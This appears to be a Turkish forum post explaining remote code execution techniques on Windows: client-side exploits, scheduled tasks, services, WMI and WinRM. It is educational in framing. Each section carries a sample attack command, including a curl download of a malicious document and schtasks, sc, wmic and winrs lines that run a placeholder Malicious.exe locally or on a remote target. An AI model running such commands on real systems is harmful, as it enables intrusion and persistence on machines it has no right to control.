zaktan kod çalıştırma (Remote Code Execution - RCE), saldırganların uzaktaki bir sistemde keyfi kod çalıştırmasına olanak tanır ve genellikle hedef makinenin tam kontrolünü elde etmekle sonuçlanır. İşte yaygın olarak kullanılan bazı teknikler:
1. İstemci Uygulamaları Üzerinden Sömürü
Açıklama: Bu teknik, bir istemci uygulamasındaki güvenlik açıklarını kullanarak kodu kullanıcının makinesinde çalıştırmayı içerir. Bu uygulamalar web tarayıcıları, e-posta istemcileri veya ofis uygulamaları gibi olabilir. Saldırganlar genellikle sosyal mühendislik, zararlı ekler veya doğrudan indirmeler gibi yöntemler kullanır.
Örnek:
Tarayıcı Açıkları: Bir web tarayıcısındaki açıkları kullanarak JavaScript ile bir yükü tetiklemek.
Ofis Belgesi Açıkları: Bir Word veya Excel belgesine zararlı makrolar veya yükler yerleştirmek.
curl -O http://example.com/malicious_document.docx
Ana Noktalar:
Kullanıcı etkileşimi veya sosyal mühendislik gerektirir.
Yaygın kullanılan istemci uygulamalarındaki bilinen güvenlik açıklarına dayanır.
2. Planlanmış Görev
Açıklama: Planlanmış görevler, belirli zamanlarda veya aralıklarla otomatik olarak çalışacak şekilde ayarlanmış görevlerdir. Saldırganlar, planlanmış görevler oluşturarak veya değiştirerek zararlı yüklerini hedef sistemde çalıştırabilirler.
Örnek:
Yeni Bir Planlanmış Görev Oluşturma: Saldırganlar schtasks komutunu kullanarak zararlı bir yük çalıştıran bir görev oluşturabilirler.
schtasks /create /tn "MaliciousTask" /tr "C:\Path\To\Malicious.exe" /sc daily /st 12:00
Ana Noktalar:
Hedef sistemde kalıcılık için kullanışlıdır.
Görevleri oluşturmak veya değiştirmek için yönetici ayrıcalıkları gerektirir.
3. Hizmet Üzerinden Çalıştırma
Açıklama: Windows hizmetleri, arka planda çalışan ve sistem ayrıcalıkları ile çalışan süreçlerdir. Bir hizmet oluşturmak veya değiştirmek, saldırganların yüklerini yüksek seviyede izinlerle çalıştırmalarına olanak tanır.
Örnek:
Yeni Bir Hizmet Oluşturma: Saldırganlar sc komutunu kullanarak zararlı bir yük çalıştıran bir hizmet oluşturabilirler.
sc create MaliciousService binPath= "C:\Path\To\Malicious.exe"
Ana Noktalar:
Hizmetler yüksek ayrıcalıklarla çalışır ve yüklerin çalıştırılması için güçlüdür.
Hizmetleri oluşturmak veya değiştirmek için yönetici ayrıcalıkları gerektirir.
4. Windows Yönetim Araçları (WMI)
Açıklama: WMI, Windows işletim sistemleri üzerinde yönetim bilgileri ve kontrol sağlar. Uzak bir sistemde kod çalıştırmak için WMI sorguları ve komutları kullanılabilir.
Örnek:
WMI Üzerinden Komut Çalıştırma: Saldırganlar WMI kullanarak uzaktaki bir makinede bir komut çalıştırabilirler.
wmic /node:"target-ip" process call create "C:\Path\To\Malicious.exe"
Ana Noktalar:
Hedef makineye doğrudan erişim gerektirmeden uzak kod çalıştırma sağlar.
Genellikle kalıcılığı sağlamak veya daha fazla komut çalıştırmak için kullanılır.
5. Windows Uzaktan Yönetim (WinRM)
Açıklama: WinRM, Windows makinelerinin uzaktan yönetimi için kullanılan bir Windows hizmetidir. WS-Management protokolünü kullanır ve uzak bir sistemde komut çalıştırmak için kullanılabilir.
Örnek:
WinRM Üzerinden Komut Çalıştırma: Saldırganlar WinRM kullanarak bir komut veya betik çalıştırabilirler.
winrs -r:target-ip "C:\Path\To\Malicious.exe"
Ana Noktalar:
Ağa bağlı bir sistemde yönetim ve komut çalıştırma sağlar.
Genellikle hedef makinenin uygun yapılandırma ve izinlerini gerektirir.
Özet
Bu tekniklerin her biri, uzaktan kod çalıştırma elde etmek için farklı yollar sunar ve saldırganın hedeflerine ve durumuna bağlı olarak kullanılır:
İstemci Uygulamaları Üzerinden Sömürü: İstemci tarafı uygulamalardaki açıkları sömürür.
Planlanmış Görev: Belirli zamanlarda kod çalıştırmak için görevler planlar.
Hizmet Üzerinden Çalıştırma: Yüksek ayrıcalıklara sahip hizmetler kullanarak kod çalıştırır.
WMI: WMI kullanarak uzaktan komut çalıştırır.
WinRM: Windows Uzaktan Yönetim kullanarak komut çalıştırır.
Bu teknikleri anlamak, sistemlerin güvenliğini artırmak ve uzaktan kod çalıştırma için potansiyel açıkları belirlemek için önemlidir.
Elinize ve emeğinize sağlık hocam.